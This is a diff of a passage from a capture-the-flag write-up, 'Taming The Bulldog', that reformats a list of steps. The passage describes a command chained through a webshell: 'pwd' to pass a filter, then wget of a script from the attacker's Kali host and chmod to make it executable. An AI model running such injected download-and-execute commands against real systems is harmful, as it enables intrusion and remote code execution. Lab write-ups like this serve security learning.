berzerk0/GitPage/FirstCTF_2of2_TamingTheBulldog.md

 The command we run through the webshell will need to download the script from Kali and make it executable.

-We will need to break our command down into parts: o	`pwd` to trick the if statement o	`cd /tmp` to change to a directory where we have permission to download files o	`wget  http://KALI_IP:1234/script.sh` to download to that directory o	`chmod +x script.sh` to make the script executable
+We will need to break our command down into parts:
+*	`pwd` to trick the if statement
+*	`cd /tmp` to change to a directory where we have permission to download files
+*	`wget  http://KALI_IP:1234/script.sh` to download to that directory
+*	`chmod +x script.sh` to make the script executable

 Run this in the webshell:
 `pwd && cd /tmp && wget http://KALI_IP:1234/script.sh && chmod +x script.sh`